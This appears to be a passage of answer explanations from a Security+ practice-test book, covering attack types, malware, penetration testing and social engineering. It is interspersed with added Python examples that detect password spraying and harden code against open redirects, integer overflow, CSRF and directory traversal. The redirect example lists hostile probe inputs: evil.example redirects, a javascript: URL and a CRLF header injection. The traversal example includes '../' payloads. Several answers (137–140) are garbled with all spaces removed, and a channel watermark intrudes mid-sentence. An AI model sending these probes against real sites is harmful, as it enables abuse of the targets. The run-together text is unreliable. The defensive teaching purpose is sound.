85. D. In a DLL injection attack, the attacker forces a running process to load a malicious dynamic link library (DLL), so the attacker's code executes inside that process with its privileges. This is a rather advanced attack. Option A is incorrect: a logic bomb executes its misdeed when some condition is met. Option B is incorrect: session hijacking is taking over an authenticated session. Option C is incorrect: buffer overflows are done by sending more data to a variable than it can hold.

86. B. State actors (or nation-state actors) often have greater resources and skills, making them a more significant threat and far more likely to be associated with an advanced persistent threat actor. Script kiddies, hacktivists, and insider threats tend to be less capable and are all far less likely to be associated with an APT.

87. C. An intrusive scan attempts to actively exploit vulnerabilities, and thus could possibly cause some disruption of operations. For this reason, it should be conducted outside normal business hours or in a test environment, if it is used at all. A nonintrusive scan attempts to identify vulnerabilities without exploiting them. A penetration test actually attempts to breach the network by exploiting vulnerabilities. An audit is primarily a document check. Both intrusive and nonintrusive vulnerability scans can be effective at finding vulnerabilities.

88. C. A backdoor is a method for bypassing normal security and directly accessing the system. A logic bomb is malware that performs its misdeeds when some condition is met. A Trojan horse wraps a malicious program with a legitimate program; when the user downloads and installs the legitimate program, they get the malware. A rootkit is malware that gets root or administrative privileges.

89. D. The fact that the website is defaced in a manner related to the company's public policy positions indicates that the attackers were most likely engaging in hacktivism to make a political or belief-based point. Script kiddies, nation-state actors, and organized crime don't account for the statements adverse to the company's policies, which is why hacktivism is the most likely cause.

90. A. Pharming attempts to redirect traffic intended for a legitimate site to another, malicious site. Attackers most often do this by changing the local hosts file or by exploiting a trusted DNS server.

91. B. Password spraying is a specific type of brute-force attack that uses a small list of common passwords against many accounts to attempt to log in, staying under per-account lockout thresholds. Although brute forcing is technically correct, the best match here is password spraying. When you encounter questions like this on the test, make sure you provide the most accurate answer, rather than one that fits but may not be the best answer. Limited login attacks is a made-up answer, and spinning an account refers to changing the password for an account, often because of a compromise or to prevent a user from logging back into it while preserving the account.
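The distinction this answer draws between spraying and classic brute force is also the distinction a detection rule has to make: spraying shows up as one source touching many accounts a few times each, brute force as one source hammering one account. The Python below is an added example for this edit, not the book's material; the authentication log lines are constructed and the thresholds are illustrative, not taken from any product.

```python
from collections import defaultdict
from dataclasses import dataclass

# Constructed authentication events (synthetic): timestamp, source IP, account, result.
# 203.0.113.5 tries one password against many accounts (spraying);
# 198.51.100.9 hammers a single account (brute force);
# 192.0.2.44 is a user who mistyped once.
SAMPLE_LOG = """\
2021-06-01T09:00:01 203.0.113.5 alice FAIL
2021-06-01T09:00:02 203.0.113.5 bob FAIL
2021-06-01T09:00:03 203.0.113.5 carol FAIL
2021-06-01T09:00:04 203.0.113.5 dave FAIL
2021-06-01T09:00:05 203.0.113.5 erin FAIL
2021-06-01T09:00:06 203.0.113.5 frank SUCCESS
2021-06-01T09:01:00 198.51.100.9 admin FAIL
2021-06-01T09:01:01 198.51.100.9 admin FAIL
2021-06-01T09:01:02 198.51.100.9 admin FAIL
2021-06-01T09:01:03 198.51.100.9 admin FAIL
2021-06-01T09:01:04 198.51.100.9 admin FAIL
2021-06-01T09:01:05 198.51.100.9 admin FAIL
2021-06-01T09:05:00 192.0.2.44 alice FAIL
2021-06-01T09:05:30 192.0.2.44 alice SUCCESS
"""


@dataclass
class AuthEvent:
    ts: str
    src_ip: str
    user: str
    success: bool


def parse_log(text: str):
    """Parse the whitespace-separated constructed format into AuthEvent records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, result = line.split()
        events.append(AuthEvent(ts, ip, user, result == "SUCCESS"))
    return events


def classify_sources(events, spray_accounts=5, spray_max_per_account=2, brute_attempts=5):
    """Per source IP, count failures per account and label the pattern.

    spraying: at least `spray_accounts` distinct accounts, each failing at most
              `spray_max_per_account` times (the attacker is dodging lockouts).
    brute_force: any single account with `brute_attempts` or more failures.
    benign: everything else."""
    failures = defaultdict(lambda: defaultdict(int))
    for e in events:
        if not e.success:
            failures[e.src_ip][e.user] += 1
    verdicts = {}
    for ip, per_user in failures.items():
        worst = max(per_user.values())
        if len(per_user) >= spray_accounts and worst <= spray_max_per_account:
            verdicts[ip] = "password_spraying"
        elif worst >= brute_attempts:
            verdicts[ip] = "brute_force"
        else:
            verdicts[ip] = "benign"
    return verdicts


def successes_after_failures(events):
    """Accounts where a source succeeded after failing on other accounts from the
    same IP: the sign that a spray found a weak password."""
    failed_from = defaultdict(set)
    hits = []
    for e in events:
        if e.success and any(u != e.user for u in failed_from[e.src_ip]):
            hits.append((e.src_ip, e.user))
        elif not e.success:
            failed_from[e.src_ip].add(e.user)
    return hits


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print(classify_sources(evs))
    print("compromised by spray:", successes_after_failures(evs))
```

Two caveats a practitioner would add: a real spray is usually spread across many source addresses and over hours or days, so the grouping key may need to be the password-hash-independent signal of "one failure per account across the whole tenant in a window" rather than the IP, and per-account lockout alone does nothing against this pattern.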

92. C. Although you might suppose that a nation-state attacker (the usual attacker behind an advanced persistent threat) would attack from a foreign IP address, they often use a compromised address in the target country as a base for attacks. Options A, B, and D are all incorrect. These are actually signs of an advanced persistent threat.

93. B. A privilege escalation attack can occur horizontally, where attackers obtain similar levels of privilege but for other users, or vertically, where they obtain more advanced rights. In this case, Charles has discovered a vertical privilege escalation attack that has allowed the attacker to obtain administrative rights. Cross-site scripting and SQL injection are both common types of web application attacks, and a race condition occurs when data can be changed between when it is checked and when it is used.

94. A. Evil twin attacks use a malicious access point configured to appear to be identical to a legitimate AP. Attackers wait for their targets to connect via the evil twin, and can then capture or modify traffic however they wish. IP spoofing uses the IP address of a system already on the network, Trojan horses are malware that appear to be legitimate software or files, and privilege escalation is the process of using exploits to gain higher privileges.

95. A. A zero-day exploit or attack occurs before the vendor has knowledge of the vulnerability, and therefore before a patch exists. The remainder of the answers don't accurately describe a zero-day attack: just because a system has not yet been breached does not make it a zero-day, nor is a zero-day necessarily quickly exploitable. Finally, a zero-day attack does not specify how long the attacker may have access.

96. D. Prepending is one of the stranger terms that appear on the CompTIA Security+ exam and is not a commonly used phrase in the industry. Thus, you need to know that when it is used for this exam it can mean one of three things: adding an expression or phrase to an email, subject line, or headers to either protect or fool users (for example, a mail gateway tagging subjects with [EXTERNAL], or an attacker adding "RE:" to make a message look like part of an existing thread); adding data as part of an attack; and social engineers "prepending" information by inserting it into conversation to get targets to think about things the attacker wants them to. Pretexting is a social engineering technique where attackers use a reason that is intended to be believable to the target for what they are doing. SQL injection attempts to add SQL code to a web query to gain additional access or data. Prepending is used to cover a wide variety of techniques in the Security+ exam outline that focus on adding information or data to existing content.

97. D. Although auditing some libraries, or libraries that are custom-developed for the code, is common, auditing all libraries used in the code is unlikely except in exceptional situations. The remainder of these practices are all commonly used when working with outsourced code development teams.

98. C. DNS poisoning occurs when false DNS information is inserted into legitimate DNS servers or their caches, resulting in traffic being redirected to unwanted or malicious sites. A backdoor provides access to the system by circumventing normal authentication. An APT is an advanced persistent threat. A Trojan horse ties a malicious program to a legitimate program.

99. C. Spyware and adware are both common examples of a PUP, or potentially unwanted program. A CAT was made up for this question and is not a common categorization for malware, whereas worms are self-spreading malware that often exploit vulnerabilities to spread via a network. Trojans pretend to be legitimate software or are paired with legitimate software to gain entry to a system or device.

100. B. A Trojan horse pretends to be legitimate software, and may even include it, but also includes malicious software. Backdoors, RATs, and polymorphic viruses are all attacks, but they do not match what is described in the question scenario.

101. A. A remote access Trojan (RAT) is malware that gives the attacker remote access to the victim machine. Macro viruses operate inside of Microsoft Office files. Although a backdoor will give access, it is usually something in the system put there by programmers, not introduced by malware. A RAT is a type of Trojan horse, but a Trojan horse is more general than what is described in the scenario. When you encounter questions like this on the exam, you will need to select the best answer, not just one that may answer the question!

102. B. Card cloning often occurs after a skimming attack is used to capture card data, whether from credit cards or entry access cards. Brute-force and rainbow table-based attacks are both used against passwords, whereas a birthday attack is a cryptographic attack often aimed at finding two messages that hash to the same value.

103. B. Cross-site request forgery (XSRF or CSRF) sends forged requests to a website, supposedly from a trusted user. Cross-site scripting (XSS) is the injection of scripts into a website to exploit the users. A buffer overflow tries to put more data in a variable than the variable can hold. A remote-access Trojan (RAT) is malware that gives the attacker access to the system.

104. A. A denial-of-service (DoS) attack may target a memory leak. If an attacker can induce the web application to trigger the memory leak repeatedly, then eventually the web application will consume all memory on the web server and the web server will crash. Backdoors are not caused by memory leaks. SQL injection places malformed SQL into input fields. A buffer overflow attempts to put more data in a variable than it can hold.

105. D. This is an example of an application distributed denial-of-service (DDoS) attack, aimed at a gaming application. A network DDoS would be aimed at network technology, either the devices or the protocols that underlie networks. An operational technology (OT) DDoS targets SCADA, ICS, utility, or similar operational systems. A GDoS was made up for this question.

106. D. Purple teams are a combination of red and blue teams intended to leverage the techniques and tools from both sides to improve organizational security. A red team is a team that tests security by using tools and techniques like an actual attacker. A blue team is a defender team that protects against attackers (and testers like red teams!). White teams oversee cybersecurity contests and judge events between red teams and blue teams.

107. B. This is an example of ransomware, which demands payment to return your data. A rootkit provides access to administrator/root privileges. A logic bomb executes its malicious activity when some condition is met. This scenario does not describe whaling.

108. D. If access is not handled properly, a time-of-check/time-of-use (TOCTOU) condition can exist where the memory is checked, changed, then used. Memory leaks occur when memory is allocated but not deallocated. A buffer overflow is when more data is put into a variable than it can hold. An integer overflow occurs when an attempt is made to put an integer that is too large into a variable, such as trying to put a 64-bit integer into a 32-bit variable.

109. B. Near-field communication (NFC) is susceptible to an attacker eavesdropping on the signal. Tailgating is a physical attack and not affected by NFC technology. Both IP spoofing and race conditions are unrelated to NFC technology.

110. B. Fileless viruses often take advantage of PowerShell to perform actions once they have used a vulnerability in a browser or browser plug-in to inject themselves into system memory. Rick's best option from the list provided is to enable PowerShell logging (script block and module logging) and then to review the logs on systems he believes are infected. Since fileless viruses don't use files, an image of the disk is unlikely to provide much useful data. Disabling the administrative user won't have an impact, since the compromise will happen inside the account of whichever user is logged in and impacted by the malware. Crash dump files could have artifacts of the fileless virus if the machine crashed while it was active, but unless that occurs they will not have that information.

111. B. Tailgating involves simply following a legitimate user through the door once they have opened it, and it is a common means of exploiting a smart card-based entry access system. It is simpler and usually easier than attempting to capture and clone a card. Phishing is unrelated to physical security. Although it is possible to generate a fake smart card, it is a very uncommon attack. RFID spoofing can be accomplished but requires access to a valid RFID card and is relatively uncommon as well.

112. B. Adam should look for one or more threat feeds that match the type of information he is looking for. Open threat feeds exist that typically use STIX and TAXII to encode and transfer feed data to multiple tools in an open format. None of the other feed types here would meet Adam's needs.

113. B. Malicious tools like BadUSB can make a USB cable or drive look like a keyboard when they are plugged in. Somewhat strangely, the Security+ exam outline focuses on malicious USB cables, but you should be aware that malicious thumb drives are far more common and have been used by penetration testers simply by dropping them in a parking lot near their intended target. A Trojan or a worm is a possibility, but the clue involving the keyboard would point to a USB device as the first place Naomi should look.

114. D. Using a pass-the-hash attack requires attackers to acquire a legitimate hash (typically an NTLM hash pulled from memory or the SAM), and then present it to a server or service in place of the password. A real hash was provided; it was not spoofed. An evil twin is a wireless attack. Shimming is inserting malicious code between an application and a library.

115. B. Claiming to be from tech support is claiming authority, and the story the caller gave indicates urgency. The caller used urgency (the spreading virus) but did not attempt intimidation. Authority and trust are closely related, and in this case urgency was the second major factor.

116. B. The question tells us that these are Windows 10 systems, a current operating system. From there, it is safe to presume that something has gone wrong with the patching process or that there isn't a patching process. Elaine should investigate both what the process is and if there are specific reasons the systems are not patched. Since we know these systems run a current OS, option A, unsupported operating systems, can be ruled out. The vulnerabilities are specifically noted to be Windows vulnerabilities, ruling out option C, and there is no mention of protocols, eliminating option D as well.

117. A. Address Resolution Protocol (ARP) poisoning, often called ARP spoofing, occurs when an attacker sends forged ARP replies on a local area network so that hosts (including the default gateway) update the mappings they maintain between hardware (MAC) addresses and IP addresses, typically associating the attacker's MAC address with another host's IP address. In DNS poisoning, domain name to IP address entries in a DNS server are altered. The scenario as described did not involve an on-path attack, although ARP poisoning is commonly the first step toward one. A backdoor provides access to the attacker, which circumvents normal authentication.

118. A. In a known environment (white-box) test, the tester is given extensive knowledge of the target network. Full disclosure is not a term used to describe testing. Unknown environment (black-box) testing involves only very minimal information being given to the tester. A red team test simulates a particular type of attacker, such as a nation-state attacker, an insider, or another type of attacker.

119. C. Social engineering is about using people skills to get information you would not otherwise have access to. Illegal copying of software isn't social engineering, nor is gathering of discarded manuals and printouts, which describes dumpster diving. Phishing emails use some social engineering, but that is one example of social engineering, not a definition.

120. C. Shoulder surfing involves literally looking over someone's shoulder in a public place and gathering information, perhaps login passwords. ARP poisoning alters the ARP caches that hosts on the local network use to map IP addresses to MAC addresses. Phishing is an attempt to gather information, often via email, or to convince a user to click a link and/or download an attachment. A Smurf attack is a historical form of denial-of-service attack.

121. A. Invoice scams typically either send legitimate-appearing invoices to trick an organization into paying the fake invoice, or they focus on tricking employees into logging into a fake site to allow the acquisition of credentials. They typically do not focus on delivery of malware or stealing cryptocurrency.

122. B. Vulnerability scans use automated and semiautomated processes to identify known vulnerabilities. Audits usually involve document checks. Unknown and known environment testing are both types of penetration tests.

123. A. A partially known (gray-box) test involves the tester being given partial information about the network. A known environment (white-box) test involves the tester being given full or nearly full information about the target network, and unknown (black-box) environments don't provide information about the target environment. Masked is not a testing term.

124. D. In the on-path (man-in-the-middle) attack, the attacker is between the client and the server, and to either end, the attacker appears like the legitimate other end. This does not describe any denial-of-service attack. A replay attack involves resending captured login information. Although an on-path attack can be used to perform eavesdropping, in this scenario the best answer is an on-path attack.

125. A. In a man-in-the-browser attack, malware running inside the browser (for example as a malicious extension or injected code) intercepts calls between the browser and the system, such as system libraries, so it can read or alter pages and transactions after TLS has already been decrypted. An on-path attack involves having some process between the two ends of communication in order to compromise passwords or cryptographic keys. In a buffer overflow attack, more data is put into a variable than the variable was intended to hold. Session hijacking involves taking over an authenticated session.

126. B. Uniform resource locator (URL) redirection is frequently used in web applications to direct users to another service or portion of the site. If this redirection is not properly secured, it can be used to redirect to an arbitrary untrusted or malicious site. This issue, known as an open redirect vulnerability, remains quite common. The code shown does not contain SQL or LDAP code, and there is no mention of changing DNS information on the server, thus making the other options incorrect.
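The vulnerable code the question shows is not reproduced here, so the following is an added example for this edit (not the book's code or any real application's) of the pattern behind most open redirects and of a hardened replacement. The hostname is assumed, and the probe strings are constructed inputs a tester would try: an absolute URL, a protocol-relative URL, a backslash variant that browsers normalise to a slash, a javascript: scheme, and a CRLF header-injection attempt.

```python
from urllib.parse import urljoin, urlparse

# Hostname of the application, assumed for this example.
SITE_HOST = "app.example.com"


def vulnerable_redirect_target(next_param: str) -> str:
    """The pattern behind most open redirects: a user-controlled 'next' or
    'returnUrl' parameter is echoed straight into the Location header."""
    return next_param


def safe_redirect_target(next_param: str, default: str = "/") -> str:
    """Allow only a relative path on this site; anything else falls back to `default`.

    Rejects absolute URLs (https://evil.example), protocol-relative URLs
    (//evil.example), backslash variants browsers turn into slashes
    (/\\evil.example), non-http schemes (javascript:), CR/LF header injection,
    and anything that does not start with exactly one '/'."""
    if not next_param or "\r" in next_param or "\n" in next_param:
        return default
    candidate = next_param.replace("\\", "/")
    parsed = urlparse(candidate)
    if parsed.scheme or parsed.netloc:
        return default
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default
    # Resolve against our own origin (collapsing ../ segments) and confirm that
    # the result still lives on our host and is not protocol-relative.
    resolved = urlparse(urljoin(f"https://{SITE_HOST}/", candidate))
    if resolved.netloc != SITE_HOST or resolved.path.startswith("//"):
        return default
    return resolved.path + (f"?{resolved.query}" if resolved.query else "")


# Constructed probes an attacker or tester would send in the 'next' parameter.
REDIRECT_PROBES = [
    "/account?tab=security",
    "https://evil.example/login",
    "//evil.example",
    "/\\evil.example",
    "javascript:alert(1)",
    "/login\r\nSet-Cookie: session=attacker",
    "",
]

if __name__ == "__main__":
    for probe in REDIRECT_PROBES:
        print(f"{probe!r:42} vulnerable -> {vulnerable_redirect_target(probe)!r:42} "
              f"safe -> {safe_redirect_target(probe)!r}")
```

Where the application genuinely needs to send users off-site (an SSO return, a partner link), replace the relative-path rule with an explicit allowlist of exact destination URLs looked up by an opaque key, rather than trying to validate attacker-supplied URLs.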

127. D. Placing a larger integer value into a smaller integer variable is an integer overflow. Memory overflow is not a term used, and memory leak is about allocating memory and not deallocating it. Buffer overflows often involve arrays. Variable overflow is not a term used in the industry.
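Answers 108 and 127 define integer overflow, but the security impact comes from what happens next: a wrapped value passes a length check that the true value would fail. The Python below is an added example for this edit, not the book's code. Python integers do not overflow, so the block uses ctypes to model C's fixed-width uint32_t and int32_t; the buffer size is an assumed constant.

```python
import ctypes

MAX_BUFFER = 4096  # assumed size of the destination buffer in this example


def u32(value: int) -> int:
    """Model C uint32_t arithmetic: the value wraps modulo 2**32."""
    return ctypes.c_uint32(value).value


def i32(value: int) -> int:
    """Model storing a wider integer in a C int32_t: bits above 32 are lost and
    the result is reinterpreted as signed, so 2**31 becomes -2**31."""
    return ctypes.c_int32(value).value


def unsafe_total_size(count: int, item_size: int) -> int:
    """Vulnerable length check: count * item_size is computed in 32 bits and the
    *wrapped* product is compared against the buffer size. A count just over
    2**30 with 4-byte items wraps to 4 and passes; the caller then copies
    count items into a 4-byte allocation."""
    total = u32(count * item_size)
    if total > MAX_BUFFER:
        raise ValueError("request too large")
    return total


def safe_total_size(count: int, item_size: int) -> int:
    """Hardened: reject negatives and check the factors before multiplying so
    the product cannot wrap, then apply the buffer bound to the true value."""
    if count < 0 or item_size < 0:
        raise ValueError("negative size")
    if item_size and count > (2**32 - 1) // item_size:
        raise ValueError("size computation would overflow 32 bits")
    total = count * item_size
    if total > MAX_BUFFER:
        raise ValueError("request too large")
    return total


def rejects(fn, *args) -> bool:
    """True if fn(*args) raises ValueError; used to demonstrate the checks."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    count, item_size = 0x40000001, 4  # 1,073,741,825 items of 4 bytes each
    print("wrapped product passes the vulnerable check as:", unsafe_total_size(count, item_size))
    print("hardened check rejects it:", rejects(safe_total_size, count, item_size))
    print("2**31 stored in an int32 becomes:", i32(2**31))
```

The same shape appears in real allocators and parsers whenever a length is multiplied or added before being compared; compilers will not warn, because unsigned wrap-around is defined behaviour in C, so the check has to be written against the operands rather than the result.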

128. B. Cross-site request forgery (XSRF or CSRF) takes advantage of the cookies and URL parameters legitimate sites use to help track and serve their visitors. In an XSRF or CSRF attack, attackers leverage authorized, authenticated users' rights: the victim's browser automatically attaches the cookie or session data for the target site to any request it sends there, so a request forged by the attacker is processed as if the user had made it. An attacker may embed a link within an email or other location that will be clicked or executed by the user or an automated process with that user's session already open. This is not SQL injection, which would attempt to send commands to a database, or LDAP injection, which gathers data from a directory server. Cross-site scripting (XSS) would embed code in user-submittable data fields that a website will display to other users, causing it to run.
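Answers 52, 103 and 128 describe CSRF in prose; the following Python is an added example for this edit (not the book's code) that shows why the attack works and how the standard defense stops it. A request handler that trusts the session cookie alone accepts a forged POST because the victim's browser attaches that cookie automatically; the hardened handler also demands a per-session synchronizer token that a cross-origin page cannot read, and checks the Sec-Fetch-Site header browsers add. The session store and the two requests are constructed in-memory stand-ins for a real web framework.

```python
import hmac
import secrets

# In-memory session store standing in for the server's session backend:
# session_id -> {"user": ..., "csrf": per-session secret}
SESSIONS = {}


def create_session(user: str) -> str:
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    """The server embeds this in its own forms; the same-origin policy keeps a
    page on another site from reading it."""
    return SESSIONS[sid]["csrf"]


def handle_transfer_vulnerable(request: dict):
    """Trusts the session cookie alone. The victim's browser attaches that cookie
    to a request forged from any other site, so the forgery is accepted."""
    session = SESSIONS.get(request["cookies"].get("session"))
    if not session:
        return 401, "not logged in"
    return 200, f"transferred {request['form'].get('amount')} for {session['user']}"


def handle_transfer(request: dict):
    """Synchronizer-token check plus a fetch-metadata check."""
    session = SESSIONS.get(request["cookies"].get("session"))
    if not session:
        return 401, "not logged in"
    token = request["form"].get("csrf_token", "")
    # Constant-time compare; the token must arrive in the form body, never in a cookie.
    if not hmac.compare_digest(token.encode(), session["csrf"].encode()):
        return 403, "csrf token missing or invalid"
    # Browsers set Sec-Fetch-Site on every request; a cross-site value on a
    # state-changing POST is never legitimate for this application.
    if request["headers"].get("Sec-Fetch-Site", "same-origin") == "cross-site":
        return 403, "cross-site request refused"
    return 200, f"transferred {request['form'].get('amount')} for {session['user']}"


def build_requests(sid: str):
    """Two constructed requests: the victim's own form submission, and a POST
    auto-submitted by attacker.example while the victim is still logged in."""
    legitimate = {
        "cookies": {"session": sid},
        "form": {"amount": "50", "to": "alice", "csrf_token": csrf_token_for(sid)},
        "headers": {"Sec-Fetch-Site": "same-origin"},
    }
    forged = {
        "cookies": {"session": sid},                   # attached automatically by the browser
        "form": {"amount": "5000", "to": "attacker"},  # no token: the attacker cannot read it
        "headers": {"Sec-Fetch-Site": "cross-site"},
    }
    return legitimate, forged


if __name__ == "__main__":
    sid = create_session("victim")
    legit, forged = build_requests(sid)
    for name, handler in (("vulnerable", handle_transfer_vulnerable), ("hardened", handle_transfer)):
        print(f"{name:10} legitimate: {handler(legit)}  forged: {handler(forged)}")
```

Setting the session cookie with SameSite=Lax or Strict adds a third, browser-enforced layer, but the token check remains the portable defense for older clients and for subdomain-hosted attacker content.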

129. D. You will need to be able to read and understand basic scripts and programs in multiple languages for the Security+ exam. In this example, you can recognize common Bash syntax and see that it is adding a key to the authorized_keys file for root. If that's not an expected script, you should be worried!

130. D. Rootkits provide administrative access to systems, thus the "root" in rootkit. A Trojan horse combines malware with a legitimate program. A logic bomb performs its malicious activity when some condition is met. A multipartite virus infects the boot sector and a file.

131. C. Memory leaks can c​ause crashes, resulting in an outage. This targets the availability leg of the CIA (confidentiality, integrity, and availability) triad, making it a security issue. Memory leaks do not actually leak to other locations, nor do they allow code injection. Instead, memory leaks cause memory exhaustion or other issues over time as memory is not properly reclaimed.

132. B. This question combines two pieces of knowledge: how botnet command and control works, and that IRC's default port is TCP 6667. Although this could be one of the other answers, the most likely answer given the information available is a botnet that uses Internet Relay Chat (IRC) as its command-and-control channel.

133. A. Software updates for consumer-grade wireless routers are typically applied as firmware updates, and Susan should recommend that the business owner regularly upgrade their wireless router firmware. If updates are not available, they may need to purchase a new router that will continue to receive updates and configure it appropriately. This is not a default configuration issue nor an unsecured administrative account (neither is mentioned), nor is encryption.

134. B. Radio frequency identification (RFID) is commonly used for access badges, inventory systems, and even for identifying pets using implantable chips. In a penetration testing scenario, attackers are most likely to attempt to acquire or clone RFID-based access badges to gain admittance to a building or office suite.

135. B. The word you will need to know for the Security+ exam for phishing via SMS is "smishing," a term that combines SMS and phishing. Bluejacking sends unsolicited messages to Bluetooth devices, and phone jacking and text whaling were made up for this question.

136. B. This is vishing, or using voice calls for phishing. Spear phishing is targeting a small, specific group. War dialing is dialing numbers hoping a computer modem answers. Robocalling is used to place unsolicited telemarketing calls.

137. A. Wormsspreadthemselvesviavulnerabilities,makingthisanexampleofaworm.Avirusissoftwarethatself-replicates.Alogicbombexecutesitsmaliciousactivitywhensomeconditionismet.ATrojanhorsecombinesmalwarewithalegitimateprogram.

138. B. Dumpsterdivingistheprocessofgoingthroughthetrashtofinddocuments.Shreddingdocumentswillhelptopreventdumpsterdiving,buttrulydedicateddumpsterdiverscanreassembleevenwell-shreddeddocuments,leadingsomeorganizationstoburntheirmostsensitivedocumentsaftertheyhavebeenshredded.Phishingisoftendoneviaemailorphoneandisanattempttoelicitinformationorconvinceausertoclickalinkoropenanattachment.Shouldersurfingisliterallylookingoversomeone’sshoulder.Intheon-path(man-in-the-middle)attack,theattackerisbetweentheclientandtheserver,andtoeitherend,theattackerappearslikethelegitimateotherend.

139. B. Systemsshouldnothavearootkitonthemwhenapenetrationteststarts,androotkitsinstalledduringthetestshouldbefullyremovedandsecurelydeleted.Therestoftheoptionsarealltypicalpartsofapenetrationtestingcleanupprocess.Youcanreadmoreatthepenetrationtestingstandardsiteatwww.pentest-standard.org/index.php/Post_Exploitation.

140. C. Thisisanexampleofanonlinebrute-forcedictionaryattack.Dictionaryattacksusecommonpasswordsaswellascommonsubstitutionstoattempttobreakintoasystemorservice.Back-offalgorithmsthatlockoutattackersafterasmallnumberofincorrectpasswordattemptscanhelpsloworstopdictionaryattacksandotherbrute-forcepasswordattacks.Rainbowtablesaretablesofprecomputedhashes.Thebirthdayattackisa

Telegram Channel @nettrain

methodforgeneratingcollisionsofhashes.Finally,nospoofingisindicatedinthisscenario.

141. C. Jim has discovered a skimmer, a device used for skimming attacks that capture credit and debit card information. Skimmers may be able to wirelessly upload the information they capture, or they may require attackers to retrieve data in person. Some skimmers include cameras to capture keypresses for PINs and other data. A replay attack would reuse credentials or other information to act like a legitimate user, a race condition occurs when the time of use and time of check of data can be exploited, and a card cloner would be used after cards were skimmed to duplicate them.

142. D. Active reconnaissance connects to the network using techniques such as port scanning. Both active and passive reconnaissance can be done manually or with tools. Black-box and white-box refer to the amount of information the tester is given. Attackers and testers use both types of reconnaissance.

143. D. Browser toolbars are sometimes examples of PUPs, or potentially unwanted programs like spyware or adware. A worm is a type of malware that spreads on its own by exploiting vulnerabilities on network-connected systems. Once it infects a system, it will typically scan for other vulnerable systems and continue to spread. A RAT is a remote-access Trojan, and a rootkit is used to gain and keep administrative access.

144. B. OSINT, or open source intelligence, is intelligence information obtained from public sources like search engines, websites, domain name registrars, and a host of other locations. OPSEC, or operational security, refers to habits such as not disclosing unnecessary information. STIX is the Structured Threat Intelligence Exchange protocol, and IntCon was made up for this question.

145. C. Watering hole attacks target groups by focusing on common shared behaviors like visiting specific websites. If attackers can compromise the site or deliver targeted attacks through it, they can then target that group. Water cooler, phishing net, and phish pond attacks were all made up for this question.

146. C. Although Structured Query Language (SQL) queries are often parameterized, Lightweight Directory Access Protocol (LDAP) security practices focus instead on user input validation and filtering of output to ensure that an excessive amount of data is not being returned in queries. As with all services, securely configuring LDAP services is one of the first protections that should be put in place.

147. B. Although it may sound dramatic, sites accessible via Tor or other tools that separate them from the rest of the Internet are sometimes called “the dark web.” The Security+ exam uses this term, so you need to be aware of it for the exam. The rest of the options were made up and may be almost as silly as calling a section of the Internet the dark web.

148. B. URL redirection has many legitimate uses, from redirecting traffic from no-longer-supported links to current replacements to URL shortening, but URL redirection was commonly used for phishing attacks. Modern browsers display the full, real URL, helping to limit the impact of this type of attack. Certificate expiration tracking is used to ensure that website certificates are current, but it does not prevent URL redirection attacks. JavaScript being enabled or disabling cookies is not helpful for this purpose either.

149. A. Vulnerabilities in cloud services require work on the part of the cloud service provider to remediate them. You can remediate most vulnerabilities in your own infrastructure yourself without a third party. Vulnerabilities in cloud services and local infrastructure can both be as severe and take as much time to remediate. Regardless of where your organization stores its data, your responsibility for it is likely the same!

150. C. Consumer wireless routers provide local administrative access via their default credentials. Although they recommend that you change the password (and sometimes the username for greater security), many installations result in an unsecured administrative account. The other answers are all common issues but not what is described in the question.

151. A. A red team is a team that tests security by using tools and techniques like an actual attacker. A blue team is a defender team that protects against attackers (and testers like red teams!). Purple teams are a combination of red and blue teams intended to leverage the techniques and tools from both sides to improve organizational security. White teams oversee cybersecurity contests and judge events between red teams and blue teams.

152. A. Directory traversal attacks attempt to exploit tools that can read directories and files by moving through the directory structure. The example would try to read the config.txt file three layers above the working directory of the web application itself. Adding common directory names or common filenames can allow attackers (or penetration testers) to read other files in accessible directories if they are not properly secured. The remainder of the options were made up for this question, although Slashdot is an actual website.
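An added example (not from the book) of the check that stops the traversal payload in question 152: a Python function that canonicalises a requested path and refuses anything that resolves outside the directory the application serves from. WEB_ROOT and the sample requests are constructed.

```python
"""Reject directory traversal in user-supplied file paths.

Added example, not from the book. The payload in question 152 walks three
levels up (../../../config.txt) from the web application's working directory;
the check below canonicalises the requested path and refuses anything that
would land outside the one directory the application may serve from. WEB_ROOT
and the sample requests are constructed.
"""
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/srv/app/public"   # constructed: the only directory we may serve


class TraversalAttempt(ValueError):
    """Raised when a requested path would escape the base directory."""


def safe_join(base: str, requested: str) -> str:
    """Return the absolute path for `requested` inside `base`, or raise.

    Order matters: percent-decode first (so an encoded dot-dot becomes ..),
    then normalise (so a/../.. collapses), then compare against base plus a
    trailing slash so that /srv/app/public-old is not taken for a child of
    /srv/app/public. On a live filesystem, follow this with os.path.realpath
    so that symlinks inside base cannot point back out of it.
    """
    decoded = unquote(requested)
    if "\x00" in decoded:
        raise TraversalAttempt("NUL byte in requested path")
    if decoded.startswith(("/", "\\")):
        raise TraversalAttempt("absolute paths are not allowed")
    decoded = decoded.replace("\\", "/")      # some servers treat \ as a separator
    base_norm = posixpath.normpath(base)
    full = posixpath.normpath(posixpath.join(base_norm, decoded))
    if full != base_norm and not full.startswith(base_norm + "/"):
        raise TraversalAttempt(f"{requested!r} resolves to {full}, outside {base_norm}")
    return full


def classify(requested: str) -> str:
    """Label a request as 'allowed:<resolved path>' or 'blocked:<reason>'."""
    try:
        return "allowed:" + safe_join(WEB_ROOT, requested)
    except TraversalAttempt as exc:
        return "blocked:" + str(exc)


if __name__ == "__main__":
    for req in ("images/logo.png", "docs/../index.html",
                "../../../config.txt", "%2e%2e/%2e%2e/config.txt", "/etc/hostname"):
        print(f"{req:28} -> {classify(req)}")
```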

153. A. Security orchestration, automation, and response (SOAR) services are designed to integrate with a broader range of both internal and external applications. Both security information and event management (SIEM) and SOAR systems typically include threat and vulnerability management tools, as well as security operations’ automation capabilities.

154. A. A known environment (white-box) test involves providing extensive information, as described in this scenario. A known environment test could be internal or external. This scenario describes the opposite of an unknown environment (black-box) test, which would involve zero knowledge. Finally, threat test is not a term used in penetration testing.

155. C. The Windows Security Account Manager (SAM) file and the /etc/shadow file for Linux systems both contain passwords and are popular targets for offline brute-force attacks.

